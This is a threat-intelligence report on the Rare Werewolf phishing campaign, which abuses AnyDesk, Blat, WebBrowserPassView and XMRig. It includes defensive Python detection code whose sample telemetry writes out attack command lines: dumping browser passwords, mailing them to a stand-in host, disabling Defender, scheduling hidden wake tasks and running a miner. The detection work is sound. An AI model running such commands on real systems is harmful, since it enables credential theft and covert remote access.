Full Report
The threat actor known as Rare Werewolf (formerly Rare Wolf) has been linked to a series of cyber attacks targeting Russia and the Commonwealth of Independent States (CIS) countries. "A distinctive feature of this threat is that the attackers favor using legitimate third-party software over developing their own malicious binaries," Kaspersky said. "The malicious functionality of the campaign
Analysis Summary
# Threat Actor: Rare Werewolf (formerly Rare Wolf)
## Attribution & Identity
Rare Werewolf is also tracked as **Librarian Ghouls** and **Rezet**. It is believed to have been active since at least 2019 and has a track record of striking organizations in Russia and Ukraine.
## Activity Summary
The threat actor is linked to cyber attacks targeting Russia and Commonwealth of Independent States (CIS) countries, impacting hundreds of Russian users. The recently documented activity starts with phishing emails carrying password-protected archives that contain executable files. The goal is to establish remote access, siphon credentials, and deploy a cryptocurrency miner (XMRig). Rather than custom malware, the campaign relies on legitimate third-party software; the malicious logic lives in command (batch) files and PowerShell scripts that install and drive those tools.
## Tactics, Techniques & Procedures
- **Initial Access:** Phishing emails delivering password-protected archives containing executable files.
- **Execution:** Utilizing command files and PowerShell scripts for executing the malicious functionality.
- **Defense Evasion:** Running Defender Control, a legitimate utility, to switch off Microsoft Defender antivirus.
- **Discovery/Collection:** Harvesting Telegram messenger data and stored passwords; browser-saved credentials are recovered with NirSoft's WebBrowserPassView.
- **Command and Control:** AnyDesk remote desktop software for interactive remote access to the victim host.
- **Exfiltration:** The legitimate Blat command-line SMTP utility, used to mail the stolen data to attacker-controlled email addresses.
- **Persistence/Automation:** A batch script launches a PowerShell script that schedules the victim system to wake at 1 a.m. local time and stay up for a four-hour window, giving the operators unattended remote access via AnyDesk while the user is away.
- **Defense Evasion (Hide Artifacts):** Using the legitimate 4t Tray Minimizer to keep the operators' tools out of sight by minimizing running applications to the system tray.
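The tool chain above, and the advice in the mitigations section below to watch for legitimate tools launched in suspicious sequences, translate naturally into a correlation rule over process-creation telemetry. The following is an added example written for this page, not code from Kaspersky, from the report, or from any recovered artifact: it groups constructed Sysmon-style events per host, counts the distinct campaign roles (defense evasion, wake scheduling, credential theft, exfiltration, remote access, mining) observed within a 24-hour window, and separately flags remote-access tool launches inside the 01:00-05:00 window the page describes. The executable names, paths, command lines, and domains in the sample are assumptions for illustration, not indicators from the report.

```python
"""Added example: correlate dual-use tool launches per host (constructed data)."""
from __future__ import annotations

import re
from collections import defaultdict
from datetime import datetime, timedelta

# Lowercase substrings of the process image path, grouped by the role each
# tool plays in the campaign. The executable names are ASSUMPTIONS for this
# sample; replace them with names/hashes from your own telemetry.
TOOL_SIGNATURES = {
    "defense_evasion": ("dcontrol", "4t-min"),  # Defender Control, 4t Tray Minimizer
    "remote_access": ("anydesk",),
    "credential_theft": ("webbrowserpassview", "mipko"),
    "exfiltration": ("blat",),
    "cryptomining": ("xmrig",),
}

# Command-line fragments that set up an unattended wake/shutdown window.
WAKE_PATTERNS = [
    re.compile(r"-WakeToRun\b", re.I),            # New-ScheduledTaskSettingsSet -WakeToRun
    re.compile(r"schtasks(\.exe)?\s+/create", re.I),
    re.compile(r"shutdown(\.exe)?\s+/s\b", re.I),
    re.compile(r"powercfg(\.exe)?\b", re.I),
]

NIGHT_START, NIGHT_END = 1, 5  # the 01:00-05:00 local window the page describes


def classify(event: dict) -> set[str]:
    """Map one process-creation event to the campaign roles it matches."""
    image = event["image"].lower()
    cats = {cat for cat, needles in TOOL_SIGNATURES.items()
            if any(n in image for n in needles)}
    if image.endswith(("powershell.exe", "pwsh.exe", "cmd.exe")):
        cmd = event.get("cmdline", "")
        if any(p.search(cmd) for p in WAKE_PATTERNS):
            cats.add("wake_scheduling")
    return cats


def is_night(ts: datetime) -> bool:
    return NIGHT_START <= ts.hour < NIGHT_END


def correlate(events: list[dict], window: timedelta = timedelta(hours=24)) -> dict:
    """For each host, pick the sliding `window` with the most distinct roles.

    Severity: 'high' if three or more roles appear, or night-time remote access
    co-occurs with wake scheduling; 'medium' for two roles or night-time remote
    access alone; otherwise 'low'.
    """
    by_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_host[ev["host"]].append(ev)

    alerts = {}
    for host, evs in by_host.items():
        best = {"categories": set(), "night_remote_access": False}
        for i, anchor in enumerate(evs):
            seen = set()
            night_remote = False
            for ev in evs[i:]:
                if ev["ts"] - anchor["ts"] > window:
                    break
                cats = classify(ev)
                seen |= cats
                if "remote_access" in cats and is_night(ev["ts"]):
                    night_remote = True
            if len(seen) > len(best["categories"]):
                best = {"categories": seen, "night_remote_access": night_remote}
        cats = best["categories"]
        if len(cats) >= 3 or (best["night_remote_access"] and "wake_scheduling" in cats):
            severity = "high"
        elif len(cats) == 2 or best["night_remote_access"]:
            severity = "medium"
        else:
            severity = "low"
        alerts[host] = {"categories": sorted(cats),
                        "night_remote_access": best["night_remote_access"],
                        "severity": severity}
    return alerts


# Constructed telemetry (hypothetical paths, names and domains), not real data.
SAMPLE_EVENTS = [
    {"host": "WS-042", "ts": datetime(2025, 6, 10, 9, 14),
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c C:\Users\ivan\AppData\Local\Temp\install.bat"},
    {"host": "WS-042", "ts": datetime(2025, 6, 10, 9, 15),
     "image": r"C:\ProgramData\dControl.exe", "cmdline": "dControl.exe"},
    {"host": "WS-042", "ts": datetime(2025, 6, 10, 9, 15),
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -NoP -W Hidden -c "Register-ScheduledTask -TaskName Upd '
                '-Settings (New-ScheduledTaskSettingsSet -WakeToRun)"'},
    {"host": "WS-042", "ts": datetime(2025, 6, 10, 9, 16),
     "image": r"C:\ProgramData\4t-min.exe", "cmdline": "4t-min.exe"},
    {"host": "WS-042", "ts": datetime(2025, 6, 10, 9, 16),
     "image": r"C:\ProgramData\WebBrowserPassView.exe",
     "cmdline": "WebBrowserPassView.exe /stext pw.txt"},
    {"host": "WS-042", "ts": datetime(2025, 6, 10, 9, 17),
     "image": r"C:\ProgramData\blat.exe",
     "cmdline": "blat.exe pw.txt -to ops@example.invalid -server smtp.example.invalid"},
    {"host": "WS-042", "ts": datetime(2025, 6, 11, 1, 3),
     "image": r"C:\ProgramData\AnyDesk.exe", "cmdline": "AnyDesk.exe"},
    {"host": "WS-042", "ts": datetime(2025, 6, 11, 1, 20),
     "image": r"C:\ProgramData\xmrig.exe", "cmdline": "xmrig.exe -o pool.example.invalid:3333"},
    # Helpdesk AnyDesk session during office hours on another host: stays low.
    {"host": "WS-007", "ts": datetime(2025, 6, 10, 14, 30),
     "image": r"C:\Program Files (x86)\AnyDesk\AnyDesk.exe", "cmdline": "AnyDesk.exe"},
]

if __name__ == "__main__":
    for host, alert in correlate(SAMPLE_EVENTS).items():
        print(host, alert)
```

The point of scoring roles rather than individual binaries is that each tool on its own (AnyDesk in particular) is common in legitimate administration; it is the combination of Defender being disabled, a wake-up task being registered, a credential dumper running and an SMTP client sending mail from a workstation, all within a day, that is characteristic. The night-time check is a cheap extra signal for the 1 a.m. window and should be tuned to local time and to any shifts that legitimately work those hours.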
## Targeting
- **Sectors:** Industrial enterprises and engineering schools.
- **Geography:** Russia (primary target), Belarus, and Kazakhstan (smaller number of infections).
- **Victims:** Hundreds of Russian users/organizations targeted.
## Tools & Infrastructure
- **Malware families used:** XMRig (Cryptocurrency Miner).
- **Legitimate Utilities Used Maliciously:** 4t Tray Minimizer, Defender Control, WebBrowserPassView, Mipko Employee Monitor, Blat (for data exfiltration).
- **Remote Access:** AnyDesk.
- **Infrastructure (C2, domains, IPs):** The scripts fetch additional files from a remote server, but no URLs or IP addresses are given in the source text.
## Implications
Rare Werewolf poses a significant threat because of its heavy reliance on legitimate, often allow-listed, third-party software: a living-off-the-land style approach in which command files and PowerShell scripts orchestrate dual-use tools instead of custom malware. This lets the group carry out widespread compromise, credential theft, and resource hijacking (cryptomining) while blending in with normal system activity, so traditional signature-based detection is largely ineffective against it.
## Mitigations
- Monitoring for the launch and use of legitimate software (e.g., 4t Tray Minimizer, AnyDesk, the Blat utility) in suspicious sequences, especially when orchestrated by PowerShell or batch scripts.
- Restricting PowerShell execution (for example with AppLocker/WDAC policies and Constrained Language Mode) and enabling script block logging (event ID 4104), so that scripts which schedule wake-ups and remote-access windows are recorded and can be detected.
- Scrutinizing incoming email attachments, especially password-protected archives, originating from untrusted sources.
- Monitoring for indicators of cryptocurrency mining activity (high CPU/GPU usage inconsistent with typical workload).
- Auditing network traffic for connections related to legitimate remote access tools (like AnyDesk) used outside of established internal IT procedures.
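The attachment-scrutiny item above can be made concrete at a mail gateway without ever extracting the archive: a ZIP's central directory stores member names and the per-member encryption flag in the clear even when the contents are password-protected, so an executable inside an encrypted archive can be rejected with no password. The following is an added example written for this page, not gateway code from any vendor or from the report. Because Python's zipfile module cannot write encrypted archives, the sample simulates a password-protected lure by setting general-purpose bit 0 in the headers of a plain archive; the file names, extension lists and verdict policy are constructed for illustration.

```python
"""Added example: triage a ZIP attachment from its central directory only (constructed data)."""
from __future__ import annotations

import io
import os
import struct
import zipfile

ENCRYPTED_FLAG = 0x0001  # general-purpose bit 0: member is password-protected
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js",
                   ".jse", ".vbs", ".vbe", ".ps1", ".msi", ".lnk", ".hta"}
NESTED_ARCHIVE_EXTS = {".zip", ".rar", ".7z", ".iso", ".img"}


def inspect_zip(data: bytes) -> dict:
    """Classify a ZIP using member metadata only; no member is decompressed.

    Verdict policy (an assumption for this example): block any archive that
    carries an executable member, encrypted or not; send encrypted archives
    and archives nesting other archives to review, since their contents cannot
    be inspected here; allow the rest.
    """
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        members = [zi for zi in zf.infolist() if not zi.is_dir()]
    encrypted = [zi.filename for zi in members if zi.flag_bits & ENCRYPTED_FLAG]
    executables = [zi.filename for zi in members
                   if os.path.splitext(zi.filename)[1].lower() in EXECUTABLE_EXTS]
    nested = [zi.filename for zi in members
              if os.path.splitext(zi.filename)[1].lower() in NESTED_ARCHIVE_EXTS]
    if executables:
        verdict = "block"
    elif encrypted or nested:
        verdict = "review"
    else:
        verdict = "allow"
    return {"encrypted": bool(encrypted), "executables": executables,
            "nested_archives": nested, "verdict": verdict}


def mark_encrypted(data: bytes) -> bytes:
    """Set bit 0 of the general-purpose flags in every local file header
    (flags at offset 6) and central directory header (flags at offset 8).

    This only simulates a password-protected archive for the offline sample;
    the member data itself is left unencrypted.
    """
    buf = bytearray(data)
    for signature, flag_offset in ((b"PK\x03\x04", 6), (b"PK\x01\x02", 8)):
        pos = buf.find(signature)
        while pos != -1:
            flags = struct.unpack_from("<H", buf, pos + flag_offset)[0] | ENCRYPTED_FLAG
            struct.pack_into("<H", buf, pos + flag_offset, flags)
            pos = buf.find(signature, pos + 4)
    return bytes(buf)


def build_sample_zip(members: dict, encrypted: bool) -> bytes:
    """Build an in-memory ZIP from {name: content}; ZIP_STORED keeps the
    member bytes verbatim so no false header signatures appear in the data."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return mark_encrypted(buf.getvalue()) if encrypted else buf.getvalue()


# Constructed samples, not real attachments. The lure uses a double extension
# so the file reads as a PDF in a file manager that hides known extensions.
LURE_MEMBERS = {"Contract_2025.pdf.exe": b"MZ" + bytes(64)}
BENIGN_MEMBERS = {"readme.txt": b"quarterly figures attached\n"}

if __name__ == "__main__":
    for label, members, enc in (("encrypted lure", LURE_MEMBERS, True),
                                ("plain lure", LURE_MEMBERS, False),
                                ("encrypted benign", BENIGN_MEMBERS, True),
                                ("plain benign", BENIGN_MEMBERS, False)):
        print(label, inspect_zip(build_sample_zip(members, enc)))
```

The check covers ZIP only; RAR and 7z need their own header parsers, and a password-protected archive that nests a second archive hides the inner names entirely, which is why the example routes nested archives to review rather than allowing them. Extension matching is a coarse first pass: a gateway should also detach and scan the archive once the password is supplied by the recipient, and treat recipients in the targeted sectors (industrial and engineering organizations) with stricter policy.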